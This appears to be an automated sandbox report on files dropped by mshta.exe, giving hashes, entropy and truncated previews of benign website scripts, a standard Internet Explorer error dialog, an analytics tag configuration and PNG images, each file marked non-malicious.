                                                                                                                                                                                                                                    Preview:"use strict";(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[703],{78748:(t,e,i)=>{i.r(e),i.d(e,{default:()=>x});var n,r,o=i(47169),a=i(8821),l=i(85169),s=i(82248),c=i(46647),p=i(32735),d=i(56875),f=p.createElement,g=function(t){(0,s.Z)(i,t);var e=(0,c.Z)(i);function i(){return(0,a.Z)(this,i),e.apply(this,arguments)}return(0,l.Z)(i,[{key:"render",value:function(){var t=this,e=this.props.publication,i=e.titleBanner,n=e.titleAlign,r=e.bgColor,o=void 0===r?null:r,a=e.titlePosition,l=e.children,s=e.borderLess;if(!l)return!1;var c=a&&"Footer"===a;return f(u,{bgColor:o},f(m,{borderLess:s},i&&!c&&f(h,{titleAlign:n},f(q,{className:"panel-title",titleAlign:n},i)),l.map((function(e){return f("div",{key:e._id},t.props.renderComponent(e))})),i&&c&&f(C,{titleAlign:n},f(q,{className:"panel-title",titleAlign:n},i))))}}]),i}(p.Component),u=d.ZP.div.withConfig({displayName:"src__Wrapper",componentId:"sc-1qaorq1-0"})(["",";"],(function(t){var e=t.bgColor;return e&&"backgroun
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (315)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):408
                                                                                                                                                                                                                                    Entropy (8bit):5.551639931235917
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6:+Ep1Jzp1J+rmWN3Nis+tFggO9leGKW+dRcuV6k0mgzVTwEWIus27ALErv3uL1QOb:+pmKdmjYeGKWMdI5LErveLy8
                                                                                                                                                                                                                                    MD5:E2141C717ACED19353C843E121FB8617
                                                                                                                                                                                                                                    SHA1:AD42B5055A1B762110695CECC8E228221548AE79
                                                                                                                                                                                                                                    SHA-256:AD9E2DC2C63617447BD5D59159E971451A6C31AC4C59053902C1FFD525118AFF
                                                                                                                                                                                                                                    SHA-512:B643292EF1FAD1249BA7509E29AEAB636A0D13D22CDE082D1E9D9D77718966B0D16501F7F527FD125194A472D7E3B636CC3837EF317AC8479C16F5455CC2CD2D
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:"use strict";(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[5335],{99838:(e,n,_)=>{_.r(n),_.d(n,{default:()=>t});var r=_(32735).createElement;const t=function(e){var n=e.publication,_=e.renderComponent;return n?n.children.map((function(e){return r("div",{key:e._id},_(e))})):null}}}]);.//# sourceMappingURL=catalogo-ui-americanas-desktop-zion-content.6b35577201554a5b827f.js.map
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (61477)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):61571
                                                                                                                                                                                                                                    Entropy (8bit):5.474088357195367
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:1536:t8MlbIwODYayNH04yljeRM9R0E4axoIyeBHv:pci5042eRM9Rj4zIyex
                                                                                                                                                                                                                                    MD5:C0DBAFACF4834B8EA409FDED93630EF9
                                                                                                                                                                                                                                    SHA1:52593A3D1EB438C99DF046C177D6626806E1753D
                                                                                                                                                                                                                                    SHA-256:153F19A31821F63A8CBAC764E1293F687C20B3E2BCDE30A05CBC2CDB52971D36
                                                                                                                                                                                                                                    SHA-512:536C645F9C8A31BE2668DC5BA9A0143BBF73F05B14780AA2F6E10192C74D4DFF47F17C8F3C07963FB405D5C4022FD123F60EFB6597DB8FEF28A1213F107E99AE
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[8600,9359],{74796:(e,t,n)=>{"use strict";n.d(t,{Z:()=>c});var i,r,a,o=n(32735);function s(){return(s=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(e[i]=n[i])}return e}).apply(this,arguments)}const c=function(e){return o.createElement("svg",s({viewBox:"0 0 315 314","aria-labelledby":"ameSymbolIcon ameSymbolDesc"},e),i||(i=o.createElement("circle",{fill:"inherit",cx:157.5,cy:157.5,r:156.5})),r||(r=o.createElement("path",{d:"M146.767 117.423c7.623 7.619 19.988 7.619 27.611 0l32.725-32.71c3.624-3.624 8.32-5.503 13.07-5.68V79h-119.2v.032c4.751.177 9.45 2.057 13.08 5.681l32.714 32.71z",fill:"#FFF",opacity:.6})),a||(a=o.createElement("path",{d:"M267.428 117.412l-32.713-32.7c-4-3.997-9.302-5.876-14.542-5.68-4.749.179-9.447 2.058-13.07 5.68l-32.724 32.71c-7.623 7.62-19.989 7.62-27.613 0l-32.713-32.71c-3.63
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1706
                                                                                                                                                                                                                                    Entropy (8bit):5.274543201400288
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:NIAbzyYh8rRLkRVNaktqavP61GJZoF+SMy:xWqxztqaHO
                                                                                                                                                                                                                                    MD5:B9BEC45642FF7A2588DC6CB4131EA833
                                                                                                                                                                                                                                    SHA1:4D150A53276C9B72457AE35320187A3C45F2F021
                                                                                                                                                                                                                                    SHA-256:B0ABE318200DCDE42E2125DF1F0239AE1EFA648C742DBF9A5B0D3397B903C21D
                                                                                                                                                                                                                                    SHA-512:C119F5625F1FC2BCDB20EE87E51FC73B31F130094947AC728636451C46DCED7B30954A059B24FEF99E1DB434581FD9E830ABCEB30D013404AAC4A7BB1186AD3A
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:...window.onerror = HandleError..function HandleError(message, url, line)..{..var str = L_Dialog_ErrorMessage + "\n\n"..+ L_ErrorNumber_Text + line + "\n"..+ message;..alert (str);..window.close();..return true;..}..function loadBdy()..{..var objOptions = window.dialogArguments;..btnNo.onclick = new Function("btnOKClick()");..btnNo.onkeydown = new Function("SwitchFocus()");..btnYes.onclick = new Function("btnYesClick()");..btnYes.onkeydown = new Function("SwitchFocus()");..document.onkeypress = new Function("docKeypress()");..spnLine.innerText = objOptions.getAttribute("errorLine");..spnCharacter.innerText = objOptions.getAttribute("errorCharacter");..spnError.innerText = objOptions.getAttribute("errorMessage");..spnCode.innerText = objOptions.getAttribute("errorCode");..txaURL.innerText = objOptions.getAttribute("errorUrl");..if (objOptions.errorDebug)..{..divDebug.innerText = L_ContinueScript_Message;..}..btnYes.focus();..}..function SwitchFocus()..{..var HTML_KEY_ARROWLEFT = 37;..
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):3247
                                                                                                                                                                                                                                    Entropy (8bit):5.459946526910292
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:96:vKFlZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:C0pv+GkduSDl6LRa
                                                                                                                                                                                                                                    MD5:16AA7C3BEBF9C1B84C9EE07666E3207F
                                                                                                                                                                                                                                    SHA1:BF0AFA2F8066EB7EE98216D70A160A6B58EC4AA1
                                                                                                                                                                                                                                    SHA-256:7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
                                                                                                                                                                                                                                    SHA-512:245559F757BAB9F3D63FB664AB8F2D51B9369E2B671CF785A6C9FB4723F014F5EC0D60F1F8555D870855CF9EB49F3951D98C62CBDF9E0DC1D28544966D4E70F1
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialog.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonface
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (39875)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):409164
                                                                                                                                                                                                                                    Entropy (8bit):5.572651142888194
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6144:Px7jMGmBYnsbQB9Z1HcRCrGRe5NAaa0Mf3/eNO9:RMpbO97Hc8Se5a5
                                                                                                                                                                                                                                    MD5:DDA5F5E7699FE8868345E0439F7FA633
                                                                                                                                                                                                                                    SHA1:129BE602A577EBF5762106555CAFB9DE8CAEBFC8
                                                                                                                                                                                                                                    SHA-256:472ECFD58467E87ED10361224CF93A283A06118ACECC810E0ED829ECC8965CA4
                                                                                                                                                                                                                                    SHA-512:24B045117326DF229365AB7AD245B62A9DC505AD6E35915306DF71665A936E582A4DFB8F23A4CD2D3DB78814F30C514344037F9A1ADE3691D4C31B71C647DE5B
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"204",. . "macros":[{"function":"__v","vtp_dataLayerVersion":1,"vtp_setDefaultValue":false,"vtp_name":"screen"},{"function":"__e"},{"function":"__v","vtp_dataLayerVersion":1,"vtp_setDefaultValue":false,"vtp_name":"product"},{"function":"__jsm","vtp_javascript":["template","(function(){try{return ",["escape",["macro",2],8,16],".map(function(a){return a.id})}catch(a){}})();"]},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"valorSacola"},{"function":"__jsm","vtp_javascript":["template","(function(){try{return ",["escape",["macro",2],8,16],".map(function(a){return a.department})}catch(a){}})();"]},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQu
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 1250 x 313, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):233747
                                                                                                                                                                                                                                    Entropy (8bit):7.995559821743559
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:6144:5VNSBY9f2Z1Tp0Oou2v/GrvQezgEM4SXkzQ:5vV9OfT7ogRzg0SXCQ
                                                                                                                                                                                                                                    MD5:12D627F2C3A692183351D98EF7087F75
                                                                                                                                                                                                                                    SHA1:816036A152AE46718A1786F728C6F022EF3D15EF
                                                                                                                                                                                                                                    SHA-256:C0794D0CC10A2D54E6F7DABEF47942564A8039555A90B81CA95B2BD5000B1074
                                                                                                                                                                                                                                    SHA-512:8DA71D096D5EBF16AE1A6EF6CC705BD95731A99069F38090B1C554F2BB073F3E063C2ACC932CB813E06C653BBAC40C92D9ACF4BB9E46CF7B16190686DF6052A0
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.......9.....=G......pHYs............... .IDATx...4.y..{......g.M...)B..C..!..`...'1....U..$..._$.........A. .E..@)..(4%..E..........j.7.....wuw...>..|.{W.....z........&...q.)..4Z.>.....yeNK............9.s.Yy.6....6)..u..-..b~...?.k.g..g~....=.w.5..K..;kZ.k.l<...u.x.e....]..4.>..sb..~q.E..S......q.._@.....>.Y.t5....h.....e.]g4ti....\....J..h<f.U.r..z.....J;tN.......;3....7L7...#.......d.sM...Sg>...`...e..p.....<=..9..[D..#.....YRBs..y.]_........M.wH.n..U..!.`.D. <.W..}.{..../....{...H..q..Gl...Yw..z..[{....M.M.c.m..F3..6..2...c.8.&.^....m.<....s%9....i}.`1.P..;mY'.:.tqy.,....[...^..m.D.?.....~...L..p/....\...Ph-....p.../.."s..G...../b..#.'.o....8.#.F.&...s.U.i.X..g[k.C..M..&c].F...n.h.=<.k..j_...X....h....X]Y.Y.m..F...7...b.......!......9...$....|1...|=f_.G...(...q.._p...G...../_.?...P..M..Fi7.....Xw.3..e..m....Y."Z'S=....[.Vk^..\.3...c...$g.:.m...t..vO6I..b.q...}....}..f7J..n..C.xW5G.i_.Mq.M.}.....26.....A..M..8b.0.?Kx~..W.
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 1250 x 313, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):305658
                                                                                                                                                                                                                                    Entropy (8bit):7.996546187796282
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:6144:h4SFEZVFVWcubD9BsWTfg40H1kOFMQc80e/kqS2Tt3fgMNXQkCJNr:hjFEZV3WcSfgp1kOxcA/kq/3fgM5Qvx
                                                                                                                                                                                                                                    MD5:0D2B22A16621D289146DFAF58E39C9B0
                                                                                                                                                                                                                                    SHA1:CBC626B4B304D3160A5CAE052A327BFAE19ACADB
                                                                                                                                                                                                                                    SHA-256:B7992F8360BC3CCAAEACD4129BAE5EBAC8E0B23044A9D51D20B49420F73190EB
                                                                                                                                                                                                                                    SHA-512:BDF3724B5A6B9E5C36B3FB3BCC779B7414B050F56545A6B2DFC3DA996621001CF0084CF3416CAC6CEAAA8E2C4E86FB0136E07855C474139C6BBBD9BC491D7C41
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.......9.....=G......pHYs............... .IDATx..y.-.Y.......<.w.{..4.... ..........vAAR.L.........;6.qR)..c0`9&..!..b..0....kB.iz.....?.Z.....=.s.....9.......k..7..q.0.".-..#..s.6~...0..^+#Z:....rB.g.7....d....k.i.v.].8..{.F..[1.....;j.....g...F.t2.8...'..{6n.....1.....<.43..E^7..I.....#/.......(...+.......,C.zNws...G.N.......ag..S^...._...v.4...F.i.:'i..........Z;..a.......#...)....$..3...:.......E.Y...p...q.x2..8..iPe..;M..i.(a|.8.y..O...5.....<!.<eQm........&..8.v...e|?.wy).GX....?...[.JVr..6.f....^....k.i....j.1L.1...n.;.9.....:..q..g....,..Y.A.o.9.....#.N..S.....M.X?.k.Id|.k.g.H..y:...K8.W..z..uy^..Y.p..Z.].?Y.-C./.."#..+Y.J^j...Y.E..e9...t.l.M_.d..ag..r..'.q......S.a!.........cZ..=........M]...t4...2.e.l....y.1...x.....i..s...[.....~...p.....4...&..~...W...An.c/.V..qe..\.E...v...0{k;3.0\..w|1.....v.3..,...E.dM+.4..'.g3......6..I.?P8..q.m....k'.=..i....i^_.i....g=l.cIvz...^....B.,.q.7..!......L#....d%.Qz..
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 192 x 296, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):89094
                                                                                                                                                                                                                                    Entropy (8bit):7.99480829678378
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:1536:vL7YP4W2zJhcThrk3fRCojq2QvNCQJEAOorvRxge0XxvqxKXw0ECa7vppSjn9lrH:vLUPkUdkZBq2fQJX1j0hyxKATFHWrQNc
                                                                                                                                                                                                                                    MD5:93835852287A8145E4E28CD40A9B9530
                                                                                                                                                                                                                                    SHA1:16A7081DDD02E55F0C3B38C29F4D88D59B1E6D47
                                                                                                                                                                                                                                    SHA-256:83070AD62528A0C79954BECD9F94535A915BEEAB67A8F6F4807E875BC2BDB577
                                                                                                                                                                                                                                    SHA-512:636969B6D5BEAEDB49EEE7D856A2A514ED42609C2E0B8B985070AB84D2FD91EC1F6B08BAECFD2A2520A34F6C4111F38A293DC2731563601BDA3948B1FF4D24C3
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.......(........\....pHYs............... .IDATx...w.]W}'...s.m.U..l..j..,Y..Ms70...0. .$..H..7..y.f&of.>.!.&.......L.!.1%..-w[..e.z.....{.._[..A.l.......[k...2......\.G...r... .q..k0.v...>..(z.Wr..955...A....H..vs~...8......D....O...;..?.J....5.......:T|....b0.......L...cdd.C##....s+.k...g.rO?-(.Ni..q.MI.p....D.).f.Q........IdUG..T..m.....'.".. .....Q.\..`........#...x.......-._.2...bQv...U..-.L.0.x.L........G."CA....C.\...E..D@Uu..8)d|U7N.$......`.*.9.o... P..9....X`....t.....R.5..a.RV.......B5.A.....HY....~..El.>Q.j.(.....D.B..pT0J....`6JrR.O.Q.(I..2..-.....*S"0.@1..1.!.4V.PAk{>....px.8.....@]U.....5..U...d...Gx.8."..B.r.j....b...S)...D.].."...z..<.....2_...J.v..A1pvw.Z.o....`r[F.m<N.f..sbpm....It.0..:.0..0....B.>/-p..E..h..C.'0..+...tK.s...1TyUP..)..(..._.C..U..^,._W=.[..k.AJCC....D ..@.n..J<...(...(:..........H6J).A.......8Z...-X..j*.^E:.Q-tI......b.J. &1=>U....l...4..9Z9.=.J.(..-.@T.Az..GlV.@._jU`6.Q<......A...A....R.p.F.
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):148863
                                                                                                                                                                                                                                    Entropy (8bit):5.505254113901523
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:1536:O/+63VZkqUOuZOf9VZgF4GZyFg3VnfS1fxDibXE6k3XHoH/WTT6u2:OW63V+xOuqV3HgQ1p+M3XHPN2
                                                                                                                                                                                                                                    MD5:D31F05B0617CF851CAEC52A9F66BFEA7
                                                                                                                                                                                                                                    SHA1:E54BB363EB0E93D6F85A9DAB42A502E8DA0AA3EA
                                                                                                                                                                                                                                    SHA-256:455449EE12DDBAB0D9690306ECED77A72CC560B8AF0649AB3EBE84E801E8FD71
                                                                                                                                                                                                                                    SHA-512:7D490199EE73C6ECED0F655314F207AD907ED1FD89F9126819540765D7B288224FF4D71B08E340CE418BDA7DADE7480E2CE752A0CD1345712F932DE0DB5FB1CC
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[6965,4446,9458,7736,7662,8773,5369],{26311:(e,n,t)=>{"use strict";t.d(n,{Z:()=>r});var i,o=t(32735);function a(){return(a=Object.assign?Object.assign.bind():function(e){for(var n=1;n<arguments.length;n++){var t=arguments[n];for(var i in t)Object.prototype.hasOwnProperty.call(t,i)&&(e[i]=t[i])}return e}).apply(this,arguments)}const r=function(e){return o.createElement("svg",a({viewBox:"0 0 18 11","aria-labelledby":"arrowIcon arrowDesc"},e),i||(i=o.createElement("path",{fill:"inherit",d:"M2.1 0L0 2.1 9 11l9-8.9L15.9 0 9 6.8 2.1 0z"})))}},96767:(e,n,t)=>{"use strict";t.d(n,{Z:()=>r});var i,o=t(32735);function a(){return(a=Object.assign?Object.assign.bind():function(e){for(var n=1;n<arguments.length;n++){var t=arguments[n];for(var i in t)Object.prototype.hasOwnProperty.call(t,i)&&(e[i]=t[i])}return e}).apply(this,arguments)}const r=function(e){return o.createElement("svg",a({viewBox:"0 0 24 32","aria-labelledby":"
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (26993)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):27084
                                                                                                                                                                                                                                    Entropy (8bit):5.460556309656924
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:384:6o0CyUivaKO05O8uDYHed29jM9DHxr4q10rjM9DpM2kUbnGlklwUvMzc5QUD/89Y:6ofyUWOf75WaJDKxPUbGlklwU/foQD
                                                                                                                                                                                                                                    MD5:158545F000AC65FBD2C2053B395663CD
                                                                                                                                                                                                                                    SHA1:2E921FF9C0C2F7C364E588116EECBE6F58DBB0A9
                                                                                                                                                                                                                                    SHA-256:23E81F7D4D1A0187DE6E96ECA45C9A1F9AF4DCD77B417385B772E967D268BB8D
                                                                                                                                                                                                                                    SHA-512:FDC29C7F3816DA27BD25F78B5C10A9319FF617A1D9481B25B202C9FC9FFA785E114AC113863169E94228E35EE440EA08068E4B0212F8783A3E8A57B6AE868CEA
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:"use strict";(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[9345],{45534:(e,t,n)=>{n.d(t,{Z:()=>a});var o,r=n(32735);function i(){return(i=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var o in n)Object.prototype.hasOwnProperty.call(n,o)&&(e[o]=n[o])}return e}).apply(this,arguments)}const a=function(e){return r.createElement("svg",i({viewBox:"0 0 24 24","aria-labelledby":"closeIcon closeDesc"},e),o||(o=r.createElement("path",{d:"M6.06 5L12 10.94 17.94 5A.75.75 0 0119 6.06L13.06 12 19 17.94A.75.75 0 0117.94 19L12 13.06 6.06 19A.75.75 0 015 17.94L10.94 12 5 6.06A.75.75 0 116.06 5z",fill:"inherit"})))}},21105:(e,t)=>{var n=Object.prototype.hasOwnProperty;function o(e){try{return decodeURIComponent(e.replace(/\+/g," "))}catch(t){return null}}function r(e){try{return encodeURIComponent(e)}catch(t){return null}}t.stringify=function(e,t){t=t||"";var o,i,a=[];for(i in"string"!==typeof t&&(t="?"),e)if(n.ca
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (13201)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):13313
                                                                                                                                                                                                                                    Entropy (8bit):5.298226828350203
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:RvpwJV6OJ9hFrsE0Q/GFdvwJV6Oa4hFrsE0LVz0NP+SFSnnxDpr71q1jHBQEhqg+:RhwV9Y8IvwhYPl0NyI19ggzCIC8tgr
                                                                                                                                                                                                                                    MD5:6F89F8B17509A037FCC31B1DD3B99499
                                                                                                                                                                                                                                    SHA1:6FBCCB7CDC6AB820F1227741D144CB07E457266A
                                                                                                                                                                                                                                    SHA-256:6459B4DBA7698D1D74AF0CF9DEF5E28BE6CD57E8B21B2279F91E4B4103F74A29
                                                                                                                                                                                                                                    SHA-512:DED0ABDD0EBC7B105F54D84311636156734AC5AAAD5AB5E245B062798E71CD15F1BF1122D058F5F8C7EF9F78BFBDF086C8F2C0ECE606F51BD3E8F17A487D2526
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[5645],{85207:e=>{var n={kind:"Document",definitions:[{kind:"OperationDefinition",operation:"query",name:{kind:"Name",value:"CookieHeaders"},variableDefinitions:[],directives:[],selectionSet:{kind:"SelectionSet",selections:[{kind:"Field",name:{kind:"Name",value:"cookies"},arguments:[],directives:[]},{kind:"Field",name:{kind:"Name",value:"headers"},arguments:[],directives:[]}]}}],loc:{start:0,end:44}};n.loc.source={body:"query CookieHeaders {\n cookies\n headers\n}\n",name:"GraphQL request",locationOffset:{line:1,column:1}};var t={};function i(e,n){for(var t=0;t<e.definitions.length;t++){var i=e.definitions[t];if(i.name&&i.name.value==n)return i}}n.definitions.forEach((function(e){if(e.name){var n=new Set;!function e(n,t){if("FragmentSpread"===n.kind)t.add(n.name.value);else if("VariableDefinition"===n.kind){var i=n.type;"NamedType"===i.kind&&t.add(i.name.value)}n.selectionSet&&n.selectionSet.selections.forEac
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (6788)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):6882
                                                                                                                                                                                                                                    Entropy (8bit):5.287000980875957
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:96:nKKmYGrF+dinRfe4fY7IpfWAbKvfrdcBYDAmYkYDymX0VFceUDtRMb/AtRMQc:nlmwg9Y7e3uZWYr/YymX0YDhR/RU
                                                                                                                                                                                                                                    MD5:685F3EAA88CD84793FF809193388D049
                                                                                                                                                                                                                                    SHA1:125250B977A6C4CCCD39B41C94B6B84E517549DC
                                                                                                                                                                                                                                    SHA-256:2A603005CA16220909E0A87AC2A9D38E797E6E6694C5E53F85BCB3A505856B35
                                                                                                                                                                                                                                    SHA-512:BB153168FC91F0FFD990BBCE1E3DFAAA0F10D1BFE99F458FCCF0CBD47421896E0EE0EE45EE00114972B5AD0C1CB0B0E591399DE4133A8CF923569192E425780F
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:"use strict";(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[863],{23970:(t,e,n)=>{n.d(e,{n:()=>C});var r=n(20011),o=n(32735),a=n(56875),i=o.createElement,c=function(t){var e=t.styles,n=void 0===e?{}:e,r=t.children,o=n.textAlign||n.align;return i("p",{className:"text",style:{textAlign:o||"initial",fontSize:14}},r)},u=o.createElement,l=function(t){var e=t.type,n=t.children;return"wrapper-ordered-list-item"===e?u("ol",{style:{listStyle:"decimal",fontSize:14}},n):u("ul",{style:{listStyle:"disc",fontSize:14}},n)},s=o.createElement,d=function(t){var e=t.children;return s("li",{style:{listStyle:"inherit"}},e)},f=o.createElement,p=function(t){var e=t.type,n=t.children;switch(e){case"header-one":return f("h1",{style:{fontSize:"22px",fontWeight:"bold"}},n);case"header-two":return f("h2",{style:{fontSize:"18px",fontWeight:"bold"}},n);case"header-three":return f("h3",{style:{fontSize:"16px",fontWeight:"bold"}},n)}return f("h1",{style:{fontSize:"22px",fontWeight:"bold"
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (12382)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):12476
                                                                                                                                                                                                                                    Entropy (8bit):5.394946879527314
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:384:B1V067CXDOXj09tmco2kGXzwz8FQ/RIKB7:BDR73cRXzwwy/OKR
                                                                                                                                                                                                                                    MD5:401635181132CBA3784868D7AC1CDDB9
                                                                                                                                                                                                                                    SHA1:6A92E910F53A5C851C6E9E65EA3B408B4DB4C463
                                                                                                                                                                                                                                    SHA-256:94D1AFBEFB2D30DB4899367A2164F18D106578658A50A061159E35C6A7D1E7D4
                                                                                                                                                                                                                                    SHA-512:B70D6B8A6AFFCC8651EAE1E86D14E340046EBD2EB7F8F8E25D90EA17AED46C0D769F1067DA86098381E0A45AC1083A1AD87EEC8B6F52DAB1B15148951AF798B7
                                                                                                                                                                                                                                    Malicious:false
